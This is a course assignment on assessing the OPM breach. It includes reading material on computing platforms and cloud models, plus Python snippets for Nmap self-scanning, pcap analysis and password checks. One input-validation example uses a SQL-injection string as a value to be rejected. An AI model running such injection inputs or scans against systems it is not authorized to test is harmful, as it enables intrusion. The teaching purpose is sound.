Project 2 Scenario
Assessing Information System Vulnerabilities and Risk
You are an information assurance management officer (IAMO) at an organization of your choosing. One morning, as you’re getting ready for work, you see an email from Karen, your manager. She asks you to come to her office as soon as you get in. When you arrive at work, you head straight to Karen’s office. “Sorry for the impromptu meeting,” she says, “but we have a bit of an emergency. There’s been a security breach at the Office of Personnel Management.”
“We don’t know how this happened, but we need to make sure it doesn’t happen again,” says Karen. “You’ll be receiving an email with more information on the security breach. Use this info to assess the information system vulnerabilities of the Office of Personnel Management.”
At your desk, you open Karen’s email. She’s given you an OPM report from the Office of the Inspector General, or OIG. You have studied the OPM OIG report and found that the hackers were able to gain access through compromised credentials. The security breach could have been prevented if the Office of Personnel Management, or OPM, had abided by previous auditing reports and security findings. In addition, access to the databases could have been prevented by implementing various encryption schemas and could have been identified after running regularly scheduled scans of the systems.
Karen and the rest of the leadership team want you to compile your findings into a Security Assessment Report, or SAR. You will also create a Risk Assessment Report, or RAR, in which you identify threats, vulnerabilities, risks, and likelihood of exploitation and suggested remediation.
Project 2 Instructions
The security posture of the information systems infrastructure of an organization should be regularly monitored and assessed (including software, hardware, firmware components, governance policies, and implementation of security controls).
The monitoring and assessment of the infrastructure and its components, policies, and processes should also account for changes and new procurements in order to stay in step with ever-changing information system technologies.
The data breach at the US Office of Personnel Management (OPM) was one of the largest in US government history. It provides a series of lessons learned for other organizations in industry and the public sector. Some failures of security practices, such as lack of diligence with security controls and management of changes to the information systems infrastructure, were cited as contributors to the massive data breach in the OPM Office of the Inspector General’s (OIG)
Final Audit Report, which can be found in open-source searches.
Some of the findings in the report include:
· weak authentication mechanisms;
· lack of a plan for life-cycle management of the information systems;
· lack of a configuration management and change management plan;
· lack of inventory of systems, servers, databases, and network devices;
· lack of mature vulnerability scanning tools;
· lack of valid authorizations for many systems; and
· lack of plans of action to remedy the findings of previous audits.
The breach ultimately resulted in removal of OPM’s top leadership. The impact of the breach on the livelihoods of millions of people may never be fully known.
There is a critical need for security programs that can assess vulnerabilities and provide mitigations.
In this project, there are eight steps, including a lab, that will help you create your final deliverables. The deliverables for this project are as follows:
1. Security Assessment Report (SAR): This should be an eight- to ten-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
2. Risk Assessment Report (RAR): This report should be a five- to six-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
Step 1: Enterprise Network Diagram
In this project, you will research and learn about types of networks and their secure constructs that may be used in an organization to accomplish the functions of the organization’s mission.
You will propose a local area network (LAN) and a wide area network (WAN) for the organization, define the systems environment, and incorporate this information in a network diagram. You will discuss the security benefits of your chosen network design.
Read the following resources about some of the computing platforms available for networks and discuss how these platforms could be implemented in your organization:
Common Computing Platforms
Computing platforms have three main components: hardware, the operating system (OS), and applications. The hardware
is the physical equipment/machine that runs the OS and applications. It generally consists of the central processing unit (CPU) or processor, storage, and memory. The operating system (OS) communicates between the hardware and the applications
run by the end user.
Different platforms are used for traditional desktops and laptops and for newer touchscreen phones and tablets. Common processors include Intel Core and AMD (for desktops) and ARM (modified by Apple and Qualcomm to make processors for phones). The most popular operating systems for desktops are Windows and Linux; for phones, they are iOS and Android.
Compatible applications are developed for specific systems by different companies, including Microsoft, Apple, Google, and Adobe.
The Hardware Cloud: Utility Computing and Its Cousins
Learning Objectives
1. Distinguish between SaaS and hardware clouds.
2. Provide examples of firms and uses of hardware clouds.
3. Understand the concepts of cloud computing, cloudbursting, and black swan events.
4. Understand the challenges and economics involved in shifting computing hardware to the cloud.
While SaaS provides the software
and hardware to replace an internal information system, sometimes a firm develops its own custom software but wants to pay someone else to run it for them. That’s where hardware clouds, utility computing, and related technologies come in. In this model, a firm replaces computing hardware that it might otherwise run on-site with a service provided by a third party online. While the term utility computing was fashionable a few years back (and old timers claim it shares a lineage with terms like hosted computing or even time sharing), now most in the industry have begun referring to this as an aspect of cloud computing, often referred to as hardware clouds. Computing hardware used in this scenario exists “in the cloud,” meaning somewhere on the Internet. The costs of systems operated in this manner look more like a utility bill—you only pay for the amount of processing, storage, and telecommunications used. Tech research firm Gartner has estimated that 80 percent of corporate tech spending goes toward data center maintenance. J. Rayport, “Cloud Computing Is No Pipe Dream,”
BusinessWeek, December 9, 2008. Hardware-focused cloud computing provides a way for firms to chip away at these costs.
Major players are spending billions building out huge data centers to take all kinds of computing out of the corporate data center and place it in the cloud. While cloud vendors typically host your software on their systems, many of these vendors also offer additional tools to help in creating and hosting apps in the cloud. Salesforce.com offers Force.com, which includes not only a hardware cloud but also several cloud-supporting tools, such as a programming environment (IDE) to write applications specifically tailored for Web-based delivery. Google’s App Engine offers developers several tools, including a database product called Big Table. And Microsoft offers a competing product—Windows Azure that runs the SQL Azure database. These efforts are often described by the phrase platform as a service (PaaS) since the cloud vendor provides a more complete platform (e.g., hosting hardware, operating system, database, and other software), which clients use to build their own applications.
Another alternative is called infrastructure as a service (IaaS). This is a good alternative for firms that want even more control. In IaaS, clients can select their own operating systems, development environments, underlying applications like databases, or other software packages (i.e., clients, and not cloud vendors, get to pick the platform), while the cloud firm usually manages the infrastructure (providing hardware and networking). IaaS services are offered by a wide variety of firms, including Amazon, Rackspace, Oracle, Dell, HP, and IBM.
Still other cloud computing efforts focus on providing a virtual replacement for operational hardware like storage and backup solutions. These include the cloud-based backup efforts like EMC’s Mozy, and corporate storage services like Amazon’s Simple Storage Solution (S3). Even efforts like Apple’s iCloud that sync user data across devices (phone, multiple desktops) are considered part of the cloud craze. The common theme in all of this is leveraging computing delivered over the Internet to satisfy the computing needs of both users and organizations.
Clouds in Action: A Snapshot of Diverse Efforts
Large, established organizations, small firms and start-ups are all embracing the cloud. The examples below illustrate the wide range of these efforts.
Journalists refer to the
New York Times as, “The Old Gray Lady,” but it turns out that the venerable paper is a cloud-pioneering whippersnapper. When the
Times decided to make roughly one hundred fifty years of newspaper archives (over fifteen million articles) available over the Internet, it realized that the process of converting scans into searchable PDFs would require more computing power than the firm had available. J. Rayport, “Cloud Computing Is No Pipe Dream,”
Business Week, December 9, 2008. To solve the challenge, a
Times IT staffer simply broke out a credit card and signed up for Amazon’s EC2 cloud computing and S3 cloud storage services. The
Times then started uploading terabytes of information to Amazon, along with a chunk of code to execute the conversion. While anyone can sign up for services online without speaking to a rep, someone from Amazon eventually contacted the
Times to check in after noticing the massive volume of data coming into its systems. Using one hundred of Amazon’s Linux servers, the
Times job took just twenty-four hours to complete. In fact, a coding error in the initial batch forced the paper to rerun the job. Even the blunder was cheap—just two hundred forty dollars in extra processing costs. Says a member of the
Times IT group: “It would have taken a month at our facilities, since we only had a few spare PCs…It was cheap experimentation, and the learning curve isn’t steep.” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008.
NASDAQ also uses Amazon’s cloud as part of its Market Replay system. The exchange uses Amazon to make terabytes of data available on demand, and uploads an additional thirty to eighty gigabytes every day. Market Replay allows access through an Adobe AIR interface to pull together historical market conditions in the ten-minute period surrounding a trade’s execution. This allows NASDAQ to produce a snapshot of information for regulators or customers who question a trade. Says the exchange’s VP of Product Development, “The fact that we’re able to keep so much data online indefinitely means the brokers can quickly answer a question without having to pull data out of old tapes and CD backups.” P. Grossman, “Cloud Computing Begins to Gain Traction on Wall Street,”
Wall Street and Technology, January 6, 2009. NASDAQ isn’t the only major financial organization leveraging someone else’s cloud. Others include Merrill Lynch, which uses IBM’s Blue Cloud servers to build and evaluate risk analysis programs; and Morgan Stanley, which relies on Force.com for recruiting applications.
IBM’s cloud efforts, which count Elizabeth Arden and the U.S. Golf Association among their customers, offer several services, including so-called cloudbursting. In a cloudbursting scenario a firm’s data center running at maximum capacity can seamlessly shift part of the workload to IBM’s cloud, with any spikes in system use metered, utility style. Cloudbursting is appealing because forecasting demand is difficult and can’t account for the ultrarare, high-impact events, sometimes called black swans. Planning to account for usage spikes explains why the servers at many conventional corporate IS shops run at only 10 to 20 percent capacity. J. Parkinson, “Green Data Centers Tackle LEED Certification,”
SearchDataCenter.com, January 18, 2007. While Cloud Labs cloudbursting service is particularly appealing for firms that already have a heavy reliance on IBM hardware in-house, it is possible to build these systems using the hardware clouds of other vendors, too.
Salesforce.com’s Force.com cloud is especially tuned to help firms create and deploy custom Web applications. The firm makes it possible to piece together projects using premade Web services that provide software building blocks for features like calendaring and scheduling. The integration with the firm’s SaaS CRM effort, and with third-party products like Google Maps allows enterprise mash-ups that can combine services from different vendors into a single application that’s run on Force.com hardware. The platform even includes tools to help deploy Facebook applications. Intuitive Surgical used Force.com to create and host a custom application to gather clinical trial data for the firm’s surgical robots. An IS manager at Intuitive noted, “We could build it using just their tools, so in essence, there was no programming.” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008. Other users include Jobscience, which used Force.com to launch its online recruiting site; and Harrah’s Entertainment, which uses Force.com applications to manage room reservations, air travel programs, and player relations.
Challenges Remain
Hardware clouds and SaaS share similar benefits and risks, and as our discussion of SaaS showed, cloud efforts aren’t for everyone. Some additional examples illustrate the challenges in shifting computing hardware to the cloud.
For all the hype about cloud computing, it doesn’t work in all situations. From an architectural standpoint, most large organizations run a hodgepodge of systems that include both package applications and custom code written in-house. Installing a complex set of systems on someone else’s hardware can be a brutal challenge and in many cases is just about impossible. For that reason we can expect most cloud computing efforts to focus on new software development projects rather than options for old software. Even for efforts that can be custom-built and cloud-deployed, other roadblocks remain. For example, some firms face stringent regulatory compliance issues. To quote one tech industry executive, “How do you demonstrate what you are doing is in compliance when it is done outside?” G. Gruman, “Early Experiments in Cloud Computing,”
InfoWorld, April 7, 2008.
Firms considering cloud computing need to do a thorough financial analysis, comparing the capital and other costs of owning and operating their own systems over time against the variable costs over the same period for moving portions to the cloud. For high-volume, low-maintenance systems, the numbers may show that it makes sense to buy rather than rent. Cloud costs can seem super cheap at first. Sun’s early cloud effort offered a flat fee of one dollar per CPU per hour. Amazon’s cloud storage rates were twenty-five cents per gigabyte per month. But users often also pay for the number of accesses and the number of data transfers. C. Preimesberger, “Sun’s ‘Open’-Door Policy,”
eWeek, April 21, 2008. A quarter a gigabyte a month may seem like a small amount, but system maintenance costs often include the need to clean up old files or put them on tape. If unlimited data is stored in the cloud, these costs can add up.
Firms should enter the cloud cautiously, particularly where mission-critical systems are concerned. Amazon’s spring 2011 cloud collapse impacted a number of firms, especially start-ups looking to leanly ramp up by avoiding buying and hosting their own hardware. HootSuite and Quora were down completely, Reddit was in “emergency read-only mode,” and Foursquare, GroupMe, and SCVNGR experienced glitches. Along with downtime, a small percentage (roughly 0.07 percent) of data involved in the crash was lost. A. Hesseldahl, “Amazon Details Last Week’s Cloud Failure, and Apologizes,”
AllThingsD, April 29, 2011. If a cloud vendor fails you and all your eggs are in one basket, then you’re down, too. Vendors with multiple data centers that are able to operate with fault-tolerant provisioning, keeping a firm’s efforts at more than one location to account for any operating interruptions, will appeal to firms with stricter uptime requirements, but even this isn’t a guarantee. A human configuration error hosed Amazon’s clients, despite the fact that the firm had confirmed redundant facilities in multiple locations. M. Rosoff, “Inside Amazon’s Cloud Disaster,”
BusinessInsider, April 22, 2011. Cloud firms often argue that their expertise translates into less downtime and failure than conventional corporate data centers, but no method is without risks.
Distributed Computing: A Definition
A distributed system is one in which the processors are less tightly coupled than in a shared-memory machine. A typical distributed system consists of many independent computers in the same room, attached via network connections. Such an arrangement is often called a cluster.
In a distributed system, each processor has its own independent memory. This precludes using shared memory for communicating. Processors instead communicate by sending messages. In a cluster, these messages are sent via the network. Though message passing is much slower than shared memory, it scales better for many processors, and it is cheaper. Plus programming such a system is arguably easier than programming for a shared-memory system, since the synchronization involved in waiting to receive a message is more intuitive. Thus, most large systems today use message passing for interprocessor communication.
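To make the message-passing idea concrete, here is a minimal Python sketch (an illustrative choice, not tied to any particular cluster framework) in which two worker processes, each with its own memory, report results to a coordinator only by sending messages through a queue. On a real cluster the queue would be replaced by network messages (for example, sockets or MPI), but the structure is the same.

# Minimal message-passing sketch: workers share no memory with the
# coordinator; they communicate results only by sending messages.
from multiprocessing import Process, Queue

def worker(worker_id, numbers, outbox):
    # Each worker computes on its own private copy of the data...
    partial_sum = sum(numbers)
    # ...and "sends a message" with the result instead of writing shared memory.
    outbox.put((worker_id, partial_sum))

if __name__ == "__main__":
    data = list(range(1_000))
    outbox = Queue()

    # Split the data and hand each half to an independent process.
    procs = [
        Process(target=worker, args=(0, data[:500], outbox)),
        Process(target=worker, args=(1, data[500:], outbox)),
    ]
    for p in procs:
        p.start()

    # The coordinator blocks until each message arrives, then combines them.
    results = [outbox.get() for _ in procs]
    for p in procs:
        p.join()

    total = sum(partial for _, partial in results)
    print("partial results:", results, "combined total:", total)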
Computing Platforms
Today, smartphones and tablets can all run sophisticated software applications. Each has its own operating system that determines which applications can run on it. Now, this tutorial looks at common hardware platforms that exist for desktop PCs, laptops, and smaller mobile devices, such as phones and tablets.
So, we’re going to start our discussion by looking at components of the typical computing device.
At the very lowest level here, we have the hardware. And one of the most important things is what central processing unit, or CPU, the hardware is going to use. So, we’ll look at different types of CPUs that support different platforms, whether it be a desktop or a phone.
After this, we have the operating system, the OS. Now, you can think of the OS as having a couple of layers. The bottom layer is the core OS service, sometimes called the kernel. Sometimes, it’s also called the Hardware Abstraction Layer, or HAL. It’s the part of the operating system that communicates directly with the hardware, whether it be the CPU or the video card and so on. The remaining operating system services sit on top of this.
At the very top is the application, and the application has to be written for a particular operating system. So you can’t run an application designed for a Macintosh operating system if you have a Windows operating system here.
Finally, the user is going to interact with the app through the graphical user interface. So, using a keyboard, a mouse, or touch, they interact with the app. Those are the three basic components of any computing platform.
Now, we’re going to look at the typical desktop platforms that have existed for a while, and we’re going to look at a few different CPUs on the market that form the basis of the hardware platform. Intel makes probably the most popular CPU, and today it’s called the Intel Core series. A few years ago, Motorola had a few CPUs that it used, given the names G3 and G4; these were called PowerPCs. At the higher end, workstation users doing 3D CAD and animation were using even more powerful CPUs based on a technology called RISC, such as the SPARC CPU, or SPARC processor.
Now, on each of these CPUs, various operating systems existed. So in the Intel Core family, we typically have Windows. There are obviously different versions, but there are two main types of Windows: what’s called 32-bit Windows, designated by x86, and the 64-bit version of Windows, called x64 (we won’t go into that now). But there are many other operating systems that run on the Intel Core, which we’ll look at a bit later.
On workstations, or the more powerful desktop PCs, typically some version of Unix runs. In the SPARC case, it was a company called Sun that created an operating system called Solaris. They have since been bought by Oracle. And on top of this are apps designed for Unix.
For the PowerPC, the G3 and G4 from Motorola, this is what OS X started out being based on. And OS X at its core has Unix as well, so we can think of this as OS X residing on top of the Unix core. Now, as things evolved, companies wanted faster and faster processors. So, this gave way to an even faster processor created by IBM called the G5, and OS X was designed to run on the IBM G5 processor. Again, we have apps designed to run on this version of OS X. At this time as well, laptops were becoming more and more important, so mobility was important. And with mobility, batteries were important. So, there was a bit of a shift from pure performance to something that had both performance and battery life. Apple found that the G5 from IBM had good performance but consumed a lot of power and couldn’t work very well in battery applications, so they eventually dropped the G5 and ported their entire operating system to the Intel Core family of CPUs. What this meant was that they had to modify their operating system and redesign their apps, which caused a little stir. So there are still OS X apps, but now they’re designed to run in an operating system that runs on the Intel Core CPU. So this was the desktop landscape, and to this day it’s still the landscape for Windows desktop computers and OS X.
We’re now going to look at phones and tablets. And really, I guess you can think of the developer of the smartphone, or the company that really made the smartphone take off, as Apple. Apple looked around and found that the Intel Core CPU simply burned too much power for something that was going to be used in a small mobile device like a phone with a small battery. So they looked at a different company called ARM Holdings, a British company that produced a CPU design that anyone could license. This CPU had the best combination of performance and battery life, or efficiency, on the market. Since ARM licensed its designs, other companies could pay a fee, modify that design, and then manufacture their own CPUs. So this is what Apple did. Apple produced an ARM-based CPU and denoted it simply as A, I assume for Apple; they have the A5 and the A6 currently out. And they used this CPU as the foundation for a new operating system. They did base this operating system on OS X, but it was significantly different, because it was designed for touch as opposed to a mouse. They called this operating system iOS. Now, to run applications on it, you need iOS apps, and they created an App Store where you could purchase iOS apps. But these iOS apps do not run on OS X; they only run on iOS mobile devices, which are typically the iPhone, the iPod touch, and the iPad.
Now, there were other companies looking at doing the same thing, and a company called Qualcomm also licensed ARM technology to produce a CPU based on it, which they called Snapdragon. These are the CPUs that Google’s Android used as the basis for its operating system, and Android runs on smartphones from Samsung and LG, as well as on tablets. So here, we need Android apps, which can run on these devices. Microsoft has come out with its own phone system, called Windows Phone 8, and it’s also based on the Snapdragon CPU, which again is a derivative of ARM. So you need a Windows Phone 8 app in order to run on a Windows Phone. Now another company has gotten into the market and also licensed ARM’s technology.
And this is NVIDIA, which produced a CPU called the Tegra. This CPU is the one in one of Microsoft’s tablets (Microsoft has two). It is used in the Microsoft Surface, specifically the Surface that uses what is called Windows RT as its operating system. We’re going to talk a bit about Windows RT and about the apps that have to run on it. So as you can see, most companies developing smaller user devices like phones and tablets have not used an Intel processor, because it simply consumes too much power. They have gone to an ARM-based technology: they’ve licensed that technology, modified it, added cores and graphics processors, and then used that as a basis on which to build a phone, a tablet, or some other mobile device. And Microsoft has not quite followed that type of model. So you see that Apple has made quite a distinction between its mobile device OS and its desktop OS.
What Microsoft has done is come out with a new operating system they called Windows RT. Windows RT has a new type of desktop, and if you’ve seen Windows 8 and its new desktop, that is the RT part of Windows. So you can almost think of Windows 8 now as having a dual identity. Windows RT is part of a new tablet called the Microsoft Surface. A Surface tablet based on Windows RT costs about $500 and has an NVIDIA Tegra, an ARM-based processor. The operating system is no longer exactly Windows 8; it’s a modified form of Windows 8 called Windows RT. And you’ll notice it has a somewhat different user interface, with what are called Live Tiles.
Now, Microsoft chose not to use the Windows Phone 8 operating system here; if you have a Windows Phone 8, you will notice the interface looks the same, but underneath it is a different operating system. And so, we have apps that will run on this, but they need to be designed for Windows RT.
Now, Microsoft also has Windows 8 in different versions, for instance Windows 8 Pro or Home. And part of Windows 8 is the typical desktop metaphor that you’re used to. If we look at how Windows 8 is now constructed, it has the normal Windows core services, or kernel, but in Windows 8 it has been broken up into two more modules. One part is WinRT (don’t confuse that with Windows RT); this is a WinRT component that is part of the Windows 8 operating system. And then we have what is called the traditional Windows OS component. Windows 8 can then run two different types of apps: a WinRT type of app, or what we’ll call a normal desktop app.
So in Windows 8, you might have an application like Adobe Photoshop; that would be a typical Windows desktop app, which would run on the traditional Windows OS component and on an Intel Core processor. The WinRT apps run on the new type of interface. You’ll notice that in Windows 8 we now have both desktops we can get to, so we now have two types of applications. Microsoft has come out with a version of its tablet called Surface; the tablet is called Surface, but you can buy the Surface with Windows RT or you can buy a Surface with Windows 8 Pro. Now, the Surface with Windows RT can only use the RT style of apps.
Now, for this new desktop, you may have heard the term Metro. At first, Microsoft was calling this the Metro design, or the Metro desktop. They ran into legal issues over the name and can’t use the term Metro, but many people still know it by that name, so some people call these Metro apps. A Metro app, or an app designed for this new interface, will work on Windows 8 and it will run on Windows RT, so it will run if you have a Windows RT Surface. The big point here is that if you have a normal Windows app like Photoshop, something that was designed for Windows, it will run on Windows 8 Pro, but it will not run on Windows RT. So if someone buys a Surface with Windows RT and thinks they can run any Windows app, they can’t. And so there has been some confusion about which applications will run on which form of Windows.
So Windows 8 now has a newer design: it has broken up the operating system to allow two different styles of apps. It looks like Microsoft is moving towards the WinRT style of apps for its desktop operating systems as well as its mobile platform. Interestingly, Windows Phone 8 is different; I’m actually not sure if the Metro apps will run on Windows Phone 8 or if it needs its own apps. When you go to buy apps from the Windows Store, you will notice that apps have new designations. You’ll find that apps you can purchase often have a designation of x86, meaning they’ll run on a 32-bit version; x64 means they’ll also run on a 64-bit version. And then you may see the letters ARM, meaning the app will run on an ARM processor, that is, on the Windows RT operating system. So if an app you purchased has all of these designations, it will run on any of the Surface devices. However, if your app has only one of the first two designations, it will not run on the Surface with Windows RT. So hopefully that has made the difference between Windows RT and Windows 8 Pro a little clearer, and given a little bit of an understanding of how any computing platform is componentized and how the hardware and the operating system work together to run various apps.
Include the rationale for each of the platforms you choose to include in your network design.
Cloud Computing
Cloud computing refers to the use of remote servers over the internet (instead of via local servers or devices) for the purpose of sharing resources. According to the National Institute of Standards and Technology (Mell & Grance, 2011):
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. (p. 2)
There are several advantages to cloud computing, including ease of use and upgrades, low capital expenditure, remote access capabilities from several locations, higher security/better data recovery, and optimized use of resources.
Cloud computing offers three service models: software as a service, or SaaS (use of Internet-based applications through web browsers); platform as a service, or PaaS (use of cloud platforms that can be used to develop applications); and infrastructure as a service, or IaaS (use of remote infrastructure to create platforms and applications).
Cloud computing is a general term for the delivery of hosted services over the internet. The use of cloud computing can increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software.
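As a small, hedged illustration of the IaaS model described above, the Python sketch below uses the boto3 library to store a file in Amazon S3 and list running EC2 instances. It assumes AWS credentials are already configured on the machine; the bucket name and file names are hypothetical placeholders.

# Illustrative IaaS interaction via AWS APIs (boto3). Assumes AWS credentials
# are configured (e.g., via environment variables or ~/.aws/credentials).
import boto3

# Object storage: upload a local backup file to an S3 bucket.
# "example-org-backups" and "backup.tar.gz" are hypothetical names.
s3 = boto3.client("s3")
s3.upload_file("backup.tar.gz", "example-org-backups", "nightly/backup.tar.gz")

# Compute: list the organization's running virtual machines (EC2 instances).
ec2 = boto3.client("ec2")
response = ec2.describe_instances(
    Filters=[{"Name": "instance-state-name", "Values": ["running"]}]
)
for reservation in response["Reservations"]:
    for instance in reservation["Instances"]:
        print(instance["InstanceId"], instance["InstanceType"])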
Just a few examples of cloud services are:
· Dropbox
· Evernote
· Mozy
· Carbonite
· Google Docs
· Runescape
References
Mell, P., & Grance, T. (2011). The NIST definition of cloud computing: Recommendations of the National Institute of Standards and Technology (Special Publication 800-145). National Institute of Standards and Technology. nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-145
Distributed Computing
Distributed computing is a computing model that uses multiple machines or servers connected through a network to share resources and complete tasks. Though the machines can be in different geographical locations, they work and appear as a single entity by communicating through encrypted messages. The latency and bandwidth of the communication channels can, however, have a significant impact on the working of the servers.
Distributed computing models perform tasks by breaking them into subtasks and solving them sequentially or simultaneously (using several machines). Hence, the models can provide greater efficiency and lower risk of failure (as compared with centralized computing models). Distributed computing systems typically use client-server, peer-to-peer, or tier architectures, depending on the functions performed by the servers.
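As a minimal illustration of breaking a task into subtasks that run simultaneously, the Python sketch below uses a local process pool; on a true distributed system the same pattern would dispatch the subtasks to separate machines. The workload (counting error lines in a log) is hypothetical.

# Break one large task into subtasks and solve them simultaneously.
from concurrent.futures import ProcessPoolExecutor

def count_keyword(chunk_of_lines):
    # Subtask: count occurrences of a keyword in one chunk of a log file.
    return sum(line.count("ERROR") for line in chunk_of_lines)

if __name__ == "__main__":
    # Hypothetical workload: a large list of log lines split into chunks.
    log_lines = ["ERROR disk full", "ok", "ERROR timeout", "ok"] * 10_000
    chunk_size = 5_000
    chunks = [log_lines[i:i + chunk_size] for i in range(0, len(log_lines), chunk_size)]

    # Each chunk is processed in parallel; results are combined at the end.
    with ProcessPoolExecutor() as pool:
        total_errors = sum(pool.map(count_keyword, chunks))

    print("total ERROR lines:", total_errors)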
Centralized Computing
Centralized computing refers to a computing model involving a central computer or server with high computing capability and sophisticated applications/software. The central server connects to client computers that have very low processing capability, so when a task needs to be performed, the clients simply send requests to the central server, which then performs most of the processing. The connection between the central server and clients can be either direct or over a network.
As all requests are processed by a central server, the centralized computing model has lower efficiency and higher risk of failure, compared with the decentralized or distributed computing model. However, the centralized model provides higher security and reliability, as all the data is stored and tasks are performed on a central server.
Secure Programming Fundamentals
It is important that programmers follow secure coding methods and adopt safe practices in the development stage, rather than trying to implement them at a later stage.
One of the fundamental secure programming practices is input validation, which is performed to prevent attacks from external sources. The National Institute of Standards and Technology (NIST) also emphasizes its importance for safe programming in its “Guide to Secure Web Services”:
Write all web service code in languages that automatically perform input validation, such as Java and C#, or if writing in C or C++, ensure that all expected input lengths and formats are explicitly specified, and that all inputs received are validated to ensure that they do not exceed those lengths or violate those formats. Error and exception handling should be expressly programmed to reject or truncate any inputs that violate the allowable input lengths/formats (Singhal et al., 2007).
Another fundamental practice to ensure security is access control, which is implemented to prevent unauthorized access resulting in intentional or unintentional changes to the code. In addition, it is important to include security tools and architectures that can detect code errors and prevent attacks. Finally, it is useful to develop mitigation strategies by modeling possible threats and testing the code.
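As a minimal sketch of the input-validation guidance quoted above, the Python function below enforces an explicit maximum length and an expected format and rejects anything that violates them; the field name and allowed format are hypothetical examples.

import re

# Hypothetical constraints for a "username" input field.
MAX_LENGTH = 32
ALLOWED_FORMAT = re.compile(r"^[A-Za-z0-9_.-]+$")  # letters, digits, _ . - only

def validate_username(raw_value: str) -> str:
    # Return the input only if it meets the expected length and format;
    # otherwise raise an error so the request can be rejected.
    if len(raw_value) > MAX_LENGTH:
        raise ValueError("input exceeds allowed length")
    if not ALLOWED_FORMAT.match(raw_value):
        raise ValueError("input violates allowed format")
    return raw_value

# Example: a web handler would call this before using the value.
print(validate_username("analyst_01"))           # accepted
try:
    validate_username("bob'; DROP TABLE users")  # rejected
except ValueError as err:
    print("rejected:", err)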
References
Singhal, A., Winograd, T., & Scarfone, K. (2007). Computer security: Guide to secure web services: Recommendations of the National Institute of Standards and Technology (Special Publication 800-95). National Institute of Standards and Technology. http://csrc.nist.gov/publications/nistpubs/800-95/SP800-95
Step 2: Enterprise Threats
Review the OIG report on the OPM breach that you were asked to research and read about at the beginning of the project. The OIG report includes many security deficiencies that likely left OPM networks vulnerable to being breached.
In addition to those external threats, the report describes the ways OPM was vulnerable to insider threats. The information about the breach could be classified as threat intelligence. Define threat intelligence and explain what kind of threat intelligence is known about the OPM breach.
You just provided detailed background information on your organization. Next, you’ll describe threats to your organization’s system. Before you get started, select and explore the contents of the resource on insider threats (also known as internal threats). As you’re reading, take note of which insider threats are a risk to your organization.
Now, differentiate between the external threats to the system and the insider threats. Identify where these threats can occur in the previously created diagrams. Relate the OPM threat intelligence to your organization. How likely is it that a similar attack will occur at your organization?
Step 3: Scan the Network
You will now investigate network traffic and the security of the network and information system infrastructure overall. Past network data has been logged and stored, as collected by a network analyzer tool such as Wireshark. Explore the tutorials and user guides to learn more about the tools you will use to monitor and analyze network activities.
You will perform a network analysis of the Wireshark files provided to you in Workspace and assess the network posture and any vulnerability or suspicious information you are able to obtain. You will identify any suspicious activities on the network through port scanning and other techniques. Include this information in your SAR.
In order to validate the assets and devices on the organization’s network, you should run scans using security and vulnerability assessment analysis tools such as OpenVAS, Nmap, or Nessus, depending on the operating systems of your organization’s networks. Live network traffic can also be sampled and scanned using Wireshark on either the Linux or Windows systems. Wireshark allows you to inspect all OSI layers of traffic information. Further analyze the packet capture for network performance, behavior, and any suspicious source and destination addresses on the networks.
Hackers frequently scan the internet for computers or networks to exploit. An effective firewall can prevent hackers from detecting the existence of networks. Hackers continue to scan ports, but if the hacker finds there is no response from the port and no connection, the hacker will move on. The firewall can block unwanted traffic and Nmap can be used to self-scan to test the responsiveness of the organization’s network to would-be hackers.
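As a hedged sketch of such a self-scan, the Python snippet below drives Nmap through the third-party python-nmap package. It requires the nmap binary to be installed and should only ever be run against networks you are authorized to scan; the address range shown is a placeholder.

# Self-scan sketch using python-nmap (requires the nmap binary and
# authorization to scan the target range). Address range is a placeholder.
import nmap

scanner = nmap.PortScanner()
# -sV probes service versions on the specified port range.
scanner.scan(hosts="192.168.1.0/24", ports="21-1024", arguments="-sV")

for host in scanner.all_hosts():
    print(f"{host} is {scanner[host].state()}")
    for proto in scanner[host].all_protocols():
        for port in sorted(scanner[host][proto].keys()):
            info = scanner[host][proto][port]
            # Open ports that answer a would-be attacker are the ones to review.
            print(f"  {proto}/{port} {info['state']} {info.get('name', '')}")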
In the existing Wireshark files, identify whether any databases have been accessed. What are the IP addresses associated with that activity? Include this information in your SAR.
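One way to look for database access in the packet captures, besides Wireshark's own display filters, is sketched below using the Scapy library: it reads a capture file and lists source/destination pairs that touch common database ports. The file name and port list are assumptions to adapt to your own capture.

# Sketch: flag traffic to common database ports in a Wireshark capture.
# "capture.pcap" and the port list are placeholders for your own data.
from collections import Counter
from scapy.all import rdpcap, IP, TCP

DB_PORTS = {1433: "MSSQL", 1521: "Oracle", 3306: "MySQL", 5432: "PostgreSQL"}

packets = rdpcap("capture.pcap")
db_flows = Counter()

for pkt in packets:
    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt[TCP].dport in DB_PORTS:
        key = (pkt[IP].src, pkt[IP].dst, DB_PORTS[pkt[TCP].dport])
        db_flows[key] += 1

for (src, dst, db), count in db_flows.most_common():
    print(f"{src} -> {dst} ({db}): {count} packets")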
Step 4: Identify Security Issues
You have a suite of security tools, techniques, and procedures that can be used to assess the security posture of your organization’s network in a SAR.
Now it’s time to identify the security issues in your organization’s networks. You have previously learned about password-cracking tools; in this step, provide an analysis of the strength of passwords used by the employees in your organization. Are weak passwords a security issue for your organization?
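A minimal sketch of such an analysis is shown below: it checks each password in a hypothetical exported list against simple length and character-class rules and against a small dictionary of known-weak values, in the spirit of the password-cracking tools covered earlier.

# Rough password-strength check over a hypothetical list of passwords.
import re

COMMON_PASSWORDS = {"password", "123456", "letmein", "qwerty", "welcome1"}

def is_weak(password: str) -> bool:
    if password.lower() in COMMON_PASSWORDS:
        return True                      # appears in a known-weak wordlist
    if len(password) < 12:
        return True                      # too short
    classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
    # Require at least three of the four character classes.
    return sum(bool(re.search(c, password)) for c in classes) < 3

samples = ["Summer2023", "P@ssw0rd", "t7#Lq9!vRx2mZ"]
for pw in samples:
    print(pw, "-> weak" if is_weak(pw) else "-> reasonable")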
Step 5: Firewalls and Encryption
